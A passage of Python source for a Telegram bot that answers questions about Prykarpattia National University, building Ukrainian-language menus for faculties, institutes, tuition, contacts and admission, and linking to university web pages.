message.text=='174' or message.text=='417' or message.text=='471' or message.text=='741' or message.text=='714':\n f7 = open('Information/ЗНО/147.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '148' or message.text=='184' or message.text=='418' or message.text=='481' or message.text=='841' or message.text=='814':\n f7 = open('Information/ЗНО/148.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '156' or message.text=='165' or message.text=='516' or message.text=='561' or message.text=='651' or message.text=='615':\n f7 = open('Information/ЗНО/156.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '157' or message.text=='175' or message.text=='517' or message.text=='571' or message.text=='751' or message.text=='715':\n f7 = open('Information/ЗНО/157.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '158' or message.text=='185' or message.text=='518' or message.text=='581' or message.text=='851' or message.text=='815':\n f7 = open('Information/ЗНО/158.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n elif message.text.lower() == '187' or message.text=='178' or message.text=='418' or message.text=='871' or message.text=='781' or message.text=='718':\n f7 = open('Information/ЗНО/187.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f7.read())\n backend(message, 'Back4.8')\n else:\n bot.send_message(message.chat.id, 'Не коректний ввід')\n\[email protected]_handler(content_types=['sticker'])\ndef sticker_id(message):\n print(message)\n\[email protected]_handler(commands = ['url']) # ДЛя ссилки на сайт\ndef url(message, url, text, message_text):\n markup = telebot.types.InlineKeyboardMarkup()\n btn_my_site= telebot.types.InlineKeyboardButton(text=text, url=url)\n markup.add(btn_my_site)\n bot.send_message(message.chat.id, message_text, reply_markup = markup)\n\[email protected]_handler(content_types=[\"text\"])\ndef any_msg(message):\n keyboard = telebot.types.InlineKeyboardMarkup()\n bot.send_sticker(message.chat.id, 'CAACAgIAAxkBAAIFrV7L69XLp2AswXQH1yWxDuxujPVvAALYAANWnb0KiQndv0vxFCcZBA')\n btn1 = telebot.types.InlineKeyboardButton(text='Економічний факультет', callback_data='економічний')\n btn2 = telebot.types.InlineKeyboardButton(text='Педагогічний факультет', callback_data='педагогічний')\n btn3 = telebot.types.InlineKeyboardButton(text='Факультет іноземних мов', callback_data='іноземних мов')\n btn4 = telebot.types.InlineKeyboardButton(text='Філософський факультет', callback_data='філософський')\n btn5 = telebot.types.InlineKeyboardButton(text='Факульмет математики та інформатики', callback_data='математики і інформатики')\n btn6 = telebot.types.InlineKeyboardButton(text='Факультет філології', callback_data='філології')\n btn7 = telebot.types.InlineKeyboardButton(text='Факультет туризму', callback_data='туризму')\n btn8 = telebot.types.InlineKeyboardButton(text='Фізико-технічний факультет', callback_data='фізико-технічний')\n btn9 = telebot.types.InlineKeyboardButton(text='Факульмет історії, політології і міжнародних відносин', callback_data='історії, політології...')\n btn10 = telebot.types.InlineKeyboardButton(text='Факультет природничих наук', callback_data='природничих наук')\n btn11 = telebot.types.InlineKeyboardButton(text='Факультет фізичного виховання і спорту', callback_data='фіз.виховання і спорту')\n\n keyboard.add(btn1)\n keyboard.add(btn2)\n keyboard.add(btn3)\n keyboard.add(btn4)\n keyboard.add(btn5)\n keyboard.add(btn6)\n keyboard.add(btn7)\n keyboard.add(btn8)\n keyboard.add(btn9)\n keyboard.add(btn10)\n keyboard.add(btn11)\n bot.send_message(message.chat.id, text='Факультети:', reply_markup=keyboard)\n backend(message, 'Back4.4')\[email protected]_query_handler(func=lambda call: True)\ndef callback_inline(call):\n textFac = 'Веб-сайт факультету'\n textInst='Веб-сайт інституту'\n textKol='Веб-сайт коледжу'\n message_textFac = 'Бажаєш перейти на веб сайт? - натисни кнопку нище:'\n if call.message:\n if call.data == 'математики і інформатики':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/Математики.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://mif.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'економічний':\n strily(call.message, call.data)\n f6 = open('Information/Факультети/Економічний.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://econ.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'педагогічний':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/Педагогічний.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://pedagogical.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'іноземних мов':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/ІноземнихМов.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://fim.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'філософський':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/Філософський.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://philosophical.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'філології':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/Філології.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://philology.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'туризму':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/Туризму.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://ft.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'фізико-технічний':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/Фізико-технічний.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://ftf.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'історії, політології...':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/ІсторіїПолітології.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://ipmv.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'фіз.виховання і спорту':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/ФізичногоВиховання.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://ffvs.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n elif call.data == 'природничих наук':\n strily(call.message,call.data)\n f6 = open('Information/Факультети/ПриродничихНаук.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://fpn.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message, 'Back4.1')\n\n elif call.data == 'Історія':\n strily(call.message,call.data)\n f6 = open('Information/Університет/Історія.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n url(call.message, 'https://pnu.edu.ua/історія/', books+' Історія', 'Для більш детальної інформації переходь сюди:')\n backend(call.message, 'Back1')\n elif call.data == 'Підрозділи':\n strily(call.message,call.data)\n any_units(call.message)\n elif call.data == 'Інститути':\n strily(call.message,call.data)\n any_insityt(call.message)\n elif call.data == 'Факультети':\n strily(call.message,call.data)\n any_msg(call.message)\n elif call.data == 'Коледж':\n strily(call.message,call.data)\n f7 = open('Information/Коледж/Коледж.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f7.read())\n url(call.message, 'https://ifk.pnu.edu.ua/', textKol, message_textFac)\n backend(call.message, 'Back4.4')\n elif call.data == 'Контакти':\n strily(call.message,call.data)\n any_contacts(call.message)\n #bot.send_message(call.message.chat.id, 'Телефонний довідник\\n\\n')\n url(call.message, 'https://pnu.edu.ua/', 'Веб-сайт університету', 'Якщо ви бажаєте перейти на сайт'\n ' Прикарпатського університету - натисніть кнопку нище:')\n backend(call.message, 'Back1')\n\n\n elif call.data=='Навчальний процес':\n strily(call.message,call.data)\n url(call.message, 'https://nmv.pnu.edu.ua/wp-content/uploads/sites/118/2019/07/розпорядження-95-р.pdf',\n 'Графік навч. процесу', 'Графік навч. процесу на 2019-2020рік можна знайти за посиланням:')\n backend(call.message,'Back2')\n elif call.data=='Наукова бібліотека':\n strily(call.message,call.data)\n f7 = open('Information/Університет/НауковаБібліотека.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f7.read())\n bot.send_message(chat_id=call.message.chat.id, text='Адрес: вул. Галицька,201Б м.Івано-Франківськ \\n'\n 'тел. (0342)78-81-05 \\nE-mail: [email protected]')\n url(call.message, 'https://lib.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message,'Back2')\n elif call.data=='Дистанційне навчання':\n strily(call.message,call.data)\n smile(call.message)\n f8 = open('Information/Студент,Абітурієнт/ДистНавчання.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n url(call.message, 'https://d-learn.pnu.edu.ua/', 'Сайт дистанційного навчання', 'Для того щоб перейти '\n 'на веб-сайт дистанційного навчання ПНУ - перейдіть за посиланням нище:')\n backend(call.message,'Back2')\n elif call.data=='Оплата за навчання':\n strily(call.message,call.data)\n cost(call.message)\n backend(call.message, 'Back2')\n elif call.data=='Вартість навчання2':\n strily(call.message,call.data)\n url(call.message, 'https://pnu.edu.ua/wp-content/uploads/2020/05/223_28.04.2020.pdf',\n bulavka+'Вартість навчання 2020-2021', lupa + 'Вартість навчання на 2020-2021рp можна знайти за посиланням:')\n backend(call.message,'Back4.2')\n elif call.data=='Вартість навчання1':\n strily(call.message,call.data)\n url(call.message, 'https://pnu.edu.ua/wp-content/uploads/2019/07/Наказ-391-new.pdf',\n bulavka+'Вартість навчання 2019-2020','Вартість навчання на 2019-2020pp можна знайти за посиланням:')\n backend(call.message,'Back4.2')\n elif call.data=='Вартість навчання3':\n strily(call.message,call.data)\n url(call.message, 'https://pnu.edu.ua/wp-content/uploads/2019/08/1903_190823130333_001.pdf',\n bulavka+'Вартість гуртожитків 2019-2020','Вартість проживання у гуртожитках на 2019-2020pp можна знайти за посиланням:')\n backend(call.message,'Back4.2')\n elif call.data=='Довідка':\n strily(call.message,call.data)\n url(call.message, 'http://comp-sc.if.ua/dovidka/', 'Довідка', 'Для того,щоб оформити довідку - перейди за посиланням.'\n '\\nP.S. На жаль, на сьогоднішній момент довідку можуть оформити тільки студенти факультету математики і інформатики')\n backend(call.message,'Back2')\n elif call.data == 'Студенські чати':\n strily(call.message,call.data)\n bot.send_message(call.message.chat.id, 'Telegram: \\n@pnutalk \\n@pnuchat \\n@pnulife \\n' )\n url(call.message, 'https://www.facebook.com/groups/pnulife', 'Facebook', 'А також y Facebook:')\n url(call.message, 'https://instagram.com/pnulife/', 'Instagram', 'Не маєш , Facebook, то заходь в Instagram:')\n backend(call.message,'Back2')\n elif call.data == 'Розклад занять':\n strily(call.message,call.data)\n bot.send_message(call.message.chat.id, 'Розклад можна знайти в телеграм-боті: @std_pnu_bot')\n url(call.message, 'http://asu.pnu.edu.ua/cgi-bin/timetable.cgi', 'Веб-розклад', 'А також на сайті:')\n backend(call.message,'Back2')\n\n elif call.data == 'Підбір спеціальності':\n pidbirSpez(call.message)\n\n elif call.data == 'Перелік ЗНО':\n strily(call.message,call.data)\n url(call.message, 'https://admission.pnu.edu.ua/wp-content/uploads/sites/6/2019/12/Додаток-4-до-ПП-20201227.pdf',\n 'Перелік ЗНО', 'Для того, щоб переглянути список можливих спеціальностей в нашому університеті та ЗНО, '\n 'неохідних для поступлення, можеш перейти за посиланням нище: ')\n backend(call.message,'Back3')\n elif call.data == 'Підготовчі курси':\n strily(call.message,call.data)\n smile(call.message)\n backend(call.message,'Back3')\n elif call.data == 'Запитання і відповіді':\n strily(call.message,call.data)\n f8 = open('Information/Студент,Абітурієнт/ЗапитанняВідповіді.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n bot.send_message(call.message.chat.id,\n ' Якщо ти не знайшов відповідь на свої запитання, то пиши нам на пошту:'\n '\\[email protected] \\nМи постараємось відповісти на все, що тебе цікавить.')\n backend(call.message,'Back3')\n elif call.data == 'Кафедра військової підготовки':\n strily(call.message,call.data)\n f8 = open('Information/Студент,Абітурієнт/КафедраВійськ.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n viskovaKaf(call.message)\n #backend(call.message,'Back3')\n elif call.data=='Перелік документів':\n strily(call.message,call.data)\n f8 = open('Information/Студент,Абітурієнт/ПерелікДокументів.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n backend(call.message,'Back4.6')\n elif call.data=='Строки':\n strily(call.message,call.data)\n f8 = open('Information/Студент,Абітурієнт/Строки.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n backend(call.message,'Back4.6')\n elif call.data == 'Правила прийому':\n strily(call.message, call.data)\n url(call.message, 'https://admission.pnu.edu.ua/wp-content/uploads/sites/6/2019/12/Додаток-9-'\n 'правила-прийому-на-кафедру-військової-підготовки-у-2020.pdf', 'Правила прийому',\n 'Правила прийому можна переглянути за посиланням:')\n backend(call.message, 'Back4.6')\n elif call.data == 'Програми вступних випробувань':\n strily(call.message, call.data)\n url(call.message, 'https://admission.pnu.edu.ua/wp-content/uploads/sites/6/2020/03/програма-з-ДПЮ-2020.pdf',\n 'Допризовна підготовка', 'Програми вступних випробувань.Оцінка рівня допризовної підготовки:')\n url(call.message, 'https://admission.pnu.edu.ua/wp-content/uploads/sites/6/2020/03/програма-з-ФІЗО-2020.pdf',\n 'Фізична підготовка', 'Програми вступних випробувань.Оцінка рівня фізичної підготовленості:')\n url(call.message, 'https://admission.pnu.edu.ua/wp-content/uploads/sites/6/2020/03/програма-проф.pdf',\n 'Психологічний відбір', 'Програми вступних випробувань. Професійний психологічний відбір:')\n backend(call.message, 'Back4.6')\n elif call.data == 'Розклад вступних випробувань':\n strily(call.message, call.data)\n url(call.message, 'https://admission.pnu.edu.ua/wp-content/uploads/sites/6/2020/03/І-етап-військова-кафедра.pdf',\n 'Розклад', 'Розклад вступних випробувань(перший етап):')\n backend(call.message, 'Back4.6')\n elif call.data == 'Іноземному студенту':\n strily(call.message,call.data)\n inozem(call.message)\n elif call.data=='Порядок прийому':\n strily(call.message,call.data)\n f8 = open('Студент,АбітурієнтПорядок/ПрийомуІноз1.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n f9 = open('Студент,АбітурієнтПорядок/ПрийомуІноз2.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f9.read())\n backend(call.message,'Back4.7')\n elif call.data=='Вартість навчання':\n strily(call.message,call.data)\n f8 = open('Information/Студент,Абітурієнт/ВартістьНавчанняІноз.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n backend(call.message,'Back4.7')\n\n elif call.data=='Керівництво':\n strily(call.message,call.data)\n f1 = open('Information/Контакти/Керівництво.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f1.read())\n backend(call.message,'Back4.3')\n elif call.data=='Приймальна комісія':\n strily(call.message,call.data)\n f2 = open('Information/Студент,Абітурієнт/ПриймальнаКомісія.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f2.read())\n backend(call.message,'Back4.3')\n elif call.data=='Бухгалтерія':\n strily(call.message,call.data)\n f3 = open('Information/Контакти/Бухгалтерія.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f3.read())\n backend(call.message,'Back4.3')\n elif call.data=='Громадські організації':\n strily(call.message,call.data)\n f4 = open('Information/Контакти/ГромадськіОрганізації.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f4.read())\n backend(call.message,'Back4.3')\n elif call.data=='Музеї':\n strily(call.message,call.data)\n f5 = open('Information/Контакти/Музеї.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f5.read())\n backend(call.message,'Back4.3')\n elif call.data=='Спортивний комплекс':\n strily(call.message,call.data)\n f6 = open('Information/Контакти/СпортивнийКомплекс.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n backend(call.message,'Back4.3')\n elif call.data=='Навчальні корпуси':\n strily(call.message,call.data)\n f6 = open('Information/Контакти/НавчальніКорпуси.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n backend(call.message,'Back4.3')\n elif call.data=='Студенське містечко':\n strily(call.message,call.data)\n f6 = open('Information/Контакти/СтуденськеМістечко.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n backend(call.message,'Back4.3')\n elif call.data=='Наукові підрозділи':\n strily(call.message,call.data)\n f10 = open('Information/Контакти/НавчальніПід1.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f10.read())\n f11 = open('Information/Контакти/НавчальніПід2.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f11.read())\n backend(call.message,'Back4.3')\n elif call.data=='Навчальні центри':\n strily(call.message,call.data)\n f6 = open('Information/Контакти/НавчальніЦентриДист.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n backend(call.message,'Back4.3')\n\n elif call.data=='Юридичний інститут':\n strily(call.message,call.data)\n f8 = open('Information/Інститути/ЮридичнийІнститут.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n url(call.message, 'https://law.pnu.edu.ua/en/', textInst, message_textFac)\n backend(call.message,'Back4.5')\n elif call.data=='Коломийський інститут':\n strily(call.message,call.data)\n f9 = open('Information/Інститути/КоломийськийІнститут.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f9.read())\n url(call.message, 'https://knni.pnu.edu.ua/en/', textInst, message_textFac)\n backend(call.message,'Back4.5')\n elif call.data=='Інститут післядипломної освіти...':\n strily(call.message,call.data)\n f8 = open('Information/Інститути/Післядипломна.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n url(call.message, 'https://ipodp.pnu.edu.ua/', textInst, message_textFac)\n backend(call.message,'Back4.5')\n elif call.data=='Інститут мистецтв':\n strily(call.message,call.data)\n\n f8 = open('Information/Інститути/ІнституМистецтв.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n url(call.message, 'https://art.pnu.edu.ua/en/', textInst, message_textFac)\n backend(call.message,'Back4.5')\n\n\n\n elif call.data=='Back1':\n any_univer(call.message)\n elif call.data=='Back2':\n any_student(call.message)\n elif call.data=='Back3':\n any_abit(call.message)\n elif call.data=='Back4.1':\n any_msg(call.message)\n elif call.data=='Back4.2':\n cost(call.message)\n elif call.data=='Back4.3':\n any_contacts(call.message)\n elif call.data=='Back4.4':\n any_units(call.message)\n elif call.data=='Back4.5':\n any_insityt(call.message)\n elif call.data=='Back4.6':\n viskovaKaf(call.message)\n elif call.data=='Back4.7':\n inozem(call.message)\n elif call.data=='Back4.8':\n pidbirSpez(call.message)\n\[email protected]_handler(content_types=[\"text\"])\ndef any_abit(message):\n bot.send_message(message.chat.id, 12 * strilky)\n Atext = 'Інформація для абітурієнта:'\n #bot.send_message(chat_id=message.chat.id, text=('Твій вибір: ' + Atext))\n keyboard = telebot.types.InlineKeyboardMarkup()\n\n btn1 = telebot.types.InlineKeyboardButton(text='Підбір спеціальності по ЗНО', callback_data='Підбір спеціальності')\n btn2 = telebot.types.InlineKeyboardButton(text='Перелік ЗНО для вступу', callback_data='Перелік ЗНО')\n #btn3 = telebot.types.InlineKeyboardButton(text='Підготовчі курси', callback_data='Підготовчі курси')\n btn4 = telebot.types.InlineKeyboardButton(text='Приймальна комісія', callback_data='Приймальна комісія')\n btn5 = telebot.types.InlineKeyboardButton(text='Оплата за навчання/гуртожиток', callback_data='Оплата за навчання')\n btn6 = telebot.types.InlineKeyboardButton(text='Контакти', callback_data='Контакти')\n btn9 = telebot.types.InlineKeyboardButton(text='Запитання і відповіді', callback_data='Запитання і відповіді')\n btn8 = telebot.types.InlineKeyboardButton(text='Кафедра військової підготовки', callback_data='Кафедра військової підготовки')\n btn7 = telebot.types.InlineKeyboardButton(text='Іноземному студенту', callback_data='Іноземному студенту')\n\n keyboard.add(btn1)\n keyboard.add(btn2)\n #keyboard.add(btn3)\n keyboard.add(btn4)\n keyboard.add(btn5)\n keyboard.add(btn6)\n keyboard.add(btn7)\n keyboard.add(btn8)\n keyboard.add(btn9)\n bot.send_message(message.chat.id, text=Atext, reply_markup=keyboard)\ndef any_univer(message):\n bot.send_message(message.chat.id, 12 * strilky)\n Utext='Інформація про університет:'\n #bot.send_message(chat_id=message.chat.id, text=('Твій вибір: ' + Utext))\n keyboard = telebot.types.InlineKeyboardMarkup()\n\n btn1 = telebot.types.InlineKeyboardButton(text='Історія', callback_data='Історія')\n btn2 = telebot.types.InlineKeyboardButton(text='Підрозділи', callback_data='Підрозділи')\n btn3 = telebot.types.InlineKeyboardButton(text='Контакти', callback_data='Контакти')\n\n keyboard.add(btn1)\n keyboard.add(btn2)\n keyboard.add(btn3)\n bot.send_message(message.chat.id, text=Utext, reply_markup=keyboard)\ndef backend(message, text):\n keyboard = telebot.types.InlineKeyboardMarkup()\n btn1 = telebot.types.InlineKeyboardButton(text='Back '+ backs, callback_data=text)\n keyboard.add(btn1)\n bot.send_message(message.chat.id, text='Повернутись?', reply_markup=keyboard)\ndef strily(message, name):\n bot.send_message(message.chat.id, 12*strilky)\n bot.send_message(chat_id=message.chat.id, text=('Твій вибір: ' + name))\ndef cost(message):\n keyboard = telebot.types.InlineKeyboardMarkup()\n btn1 = telebot.types.InlineKeyboardButton(text='Вартість навчання 2019-2020pp', callback_data='Вартість навчання1')\n btn2 = telebot.types.InlineKeyboardButton(text='Вартість навчання 2020-2021pp', callback_data='Вартість навчання2')\n btn3 = telebot.types.InlineKeyboardButton(text='Вартість гуртожитків 2019-2020pp', callback_data='Вартість навчання3')\n keyboard.add(btn1)\n keyboard.add(btn2)\n keyboard.add(btn3)\n bot.send_message(message.chat.id, text='Вартість навчання на 2019-2021рік можна знайти за посиланням:', reply_markup=keyboard)\ndef any_units(message):\n keyboard = telebot.types.InlineKeyboardMarkup()\n btn1 = telebot.types.InlineKeyboardButton(text='Інститути', callback_data='Інститути')\n btn2 = telebot.types.InlineKeyboardButton(text='Факультети', callback_data='Факультети')\n btn3 = telebot.types.InlineKeyboardButton(text='Івано-Франківський коледж', callback_data='Коледж')\n keyboard.add(btn1)\n keyboard.add(btn2)\n keyboard.add(btn3)\n bot.send_message(message.chat.id, text='Підрозділи:', reply_markup=keyboard)\n backend(message, 'Back1')\ndef any_student(message):\n bot.send_message(message.chat.id, 12 * strilky)\n Stext='Інформація для студента'\n #bot.send_message(chat_id=message.chat.id, text=('Твій вибір: ' + Stext))\n keyboard = telebot.types.InlineKeyboardMarkup()\n btn1 = telebot.types.InlineKeyboardButton(text='Розклад занять', callback_data='Розклад занять')\n btn2 = telebot.types.InlineKeyboardButton(text='Графік навчального процесу', callback_data='Навчальний процес')\n btn3 = telebot.types.InlineKeyboardButton(text='Наукова бібліотека', callback_data='Наукова бібліотека')\n btn4 = telebot.types.InlineKeyboardButton(text='Дистанційне навчання', callback_data='Дистанційне навчання')\n btn5 = telebot.types.InlineKeyboardButton(text='Оплата за навчання/гуртожиток', callback_data='Оплата за навчання')\n #btn6 = telebot.types.InlineKeyboardButton(text='Сайт кафедри', callback_data='Сайт кафедри')\n btn7 = telebot.types.InlineKeyboardButton(text='Довідка про навчання', callback_data='Довідка')\n btn8 = telebot.types.InlineKeyboardButton(text='Студенські чати', callback_data='Студенські чати')\n keyboard.add(btn1)\n keyboard.add(btn2)\n keyboard.add(btn3)\n keyboard.add(btn4)\n keyboard.add(btn5)\n #keyboard.add(btn6)\n keyboard.add(btn7)\n keyboard.add(btn8)\n\n bot.send_message(message.chat.id, text=Stext, reply_markup=keyboard)\ndef any_insityt(message):\n keyboard = telebot.types.InlineKeyboardMarkup()\n\n btn1 = telebot.types.InlineKeyboardButton(text='Інститут післядипломної освіти та довузівської підготовки',\n callback_data='Інститут післядипломної освіти...')\n btn2 = telebot.types.InlineKeyboardButton(text='Коломийський навчально-науковий Інститут', callback_data='Коломийський інститут')\n btn3 = telebot.types.InlineKeyboardButton(text='Навчально-науковий Інститут мистецтв', callback_data='Інститут мистецтв')\n btn4 = telebot.types.InlineKeyboardButton(text='Навчально-науковий Юридичний інститут', callback_data='Юридичний інститут')\n\n keyboard.add(btn1)\n keyboard.add(btn2)\n keyboard.add(btn3)\n keyboard.add(btn4)\n\n bot.send_message(message.chat.id, text='Інститути:', reply_markup=keyboard)\n backend(message, 'Back4.4')\ndef any_contacts(message):\n keyboard = telebot.types.InlineKeyboardMarkup()\n bot.send_sticker(message.chat.id, 'CAACAgIAAxkBAAIKZ17M9gESsdDoOHCPxXsAAaOqdZUUDgAC1wADVp29Cg09r24xpO5XGQQ')\n btn1 = telebot.types.InlineKeyboardButton(text='Керівництво',callback_data='Керівництво')\n btn2 = telebot.types.InlineKeyboardButton(text='Приймальна комісія', callback_data='Приймальна комісія')\n #btn3 = telebot.types.InlineKeyboardButton(text='Відділи університету', callback_data='Відділи університету')\n btn4 = telebot.types.InlineKeyboardButton(text='Бухгалтерія', callback_data='Бухгалтерія')\n btn5 = telebot.types.InlineKeyboardButton(text='Навчальні корпуси', callback_data='Навчальні корпуси')\n btn6 = telebot.types.InlineKeyboardButton(text='Громадські організації', callback_data='Громадські організації')\n btn7 = telebot.types.InlineKeyboardButton(text='Студенське містечко', callback_data='Студенське містечко')\n #btn8 = telebot.types.InlineKeyboardButton(text='Заклади харчування', callback_data='Заклади харчування')\n btn9 = telebot.types.InlineKeyboardButton(text='Спортивний комплекс', callback_data='Спортивний комплекс')\n btn10 = telebot.types.InlineKeyboardButton(text='Навчальні центри дистанційних комунікацій', callback_data='Навчальні центри')\n btn11 = telebot.types.InlineKeyboardButton(text='Навчально-наукові підрозділи', callback_data='Наукові підрозділи')\n btn12 = telebot.types.InlineKeyboardButton(text='Музеї', callback_data='Музеї')\n btn13 = telebot.types.InlineKeyboardButton(text='Інститути', callback_data='Інститути')\n btn14= telebot.types.InlineKeyboardButton(text='Факультети', callback_data='Факультети')\n btn15= telebot.types.InlineKeyboardButton(text='Івано-Франківський коледж', callback_data='Коледж')\n keyboard.add(btn1)\n keyboard.add(btn2)\n #keyboard.add(btn3)\n keyboard.add(btn4)\n keyboard.add(btn5)\n keyboard.add(btn6)\n keyboard.add(btn7)\n #keyboard.add(btn8)\n keyboard.add(btn9)\n keyboard.add(btn10)\n keyboard.add(btn11)\n keyboard.add(btn12)\n keyboard.add(btn13)\n keyboard.add(btn14)\n keyboard.add(btn15)\n bot.send_message(message.chat.id, text='Телефонний довідник:', reply_markup=keyboard)\n #any_msg(message)\n #any_insityt(message)\n #backend(message, 'Back1')\ndef viskovaKaf(message):\n keyboard = telebot.types.InlineKeyboardMarkup()\n #bot.send_sticker(message.chat.id, 'CAACAgIAAxkBAAIKZ17M9gESsdDoOHCPxXsAAaOqdZUUDgAC1wADVp29Cg09r24xpO5XGQQ')\n btn1 = telebot.types.InlineKeyboardButton(text='Перелік документів для вступу',callback_data='Перелік документів')\n btn2 = telebot.types.InlineKeyboardButton(text='Строки подачі заяв, проведення вступних випробувань, зарахування', callback_data='Строки')\n btn3 = telebot.types.InlineKeyboardButton(text='Правила прийому на кафедру військової підготовки', callback_data='Правила прийому')\n btn4 = telebot.types.InlineKeyboardButton(text='Програми вступних випробувань', callback_data='Програми вступних випробувань')\n btn5 = telebot.types.InlineKeyboardButton(text='Розклад вступних випробувань', callback_data='Розклад вступних випробувань')\n keyboard.add(btn1)\n keyboard.add(btn2)\n keyboard.add(btn3)\n keyboard.add(btn4)\n keyboard.add(btn5)\n bot.send_message(message.chat.id, text='Детальніше:', reply_markup=keyboard)\n backend(message, 'Back3')\n\n\ndef inozem(message):\n keyboard = telebot.types.InlineKeyboardMarkup()\n btn1 = telebot.types.InlineKeyboardButton(text='Порядок прийому на навчання', callback_data='Порядок прийому')\n btn2 = telebot.types.InlineKeyboardButton(text='Вартість навчання', callback_data='Вартість навчання')\n keyboard.add(btn1)\n keyboard.add(btn2)\n bot.send_message(message.chat.id, text='Інформація для іноземного студента:',reply_markup=keyboard)\n backend(message, 'Back3')\ndef pidbirSpez(message):\n bot.send_message(message.chat.id, 12 * strilky)\n Stext = 'Підбір спеціальності'\n bot.send_message(chat_id=message.chat.id, text=('Твій вибір: ' + Stext))\n f8 = open('Information/ЗНО/ZNO.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f8.read())\n backend(message, 'Back3')\n\ndef smile(message):\n #bot.send_sticker(message.chat.id, 'CAACAgIAAxkBAANwXskTHd5uisB9m9Z5CMe_1Xb0k8AAAloAA2CJbQwxXLT_o2OKHxkE')\n bot.send_message(message.chat.id, 'Нічого нового ')\nbot.polling()" } ]
2
colourful987/resign-brush
https://github.com/colourful987/resign-brush
bb38fabda0f53a1917b2eceefbf9ef2ed7a3a28c
b183529aefbbbc94749635e592dc32370c6e7645
d3ac258fa68db241c31f7babe07f331b4b44e63d
refs/heads/master
2021-01-02T19:08:22.777030
2020-02-11T14:48:32
2020-02-11T14:48:32
239,758,122
4
0
null
null
null
null
null
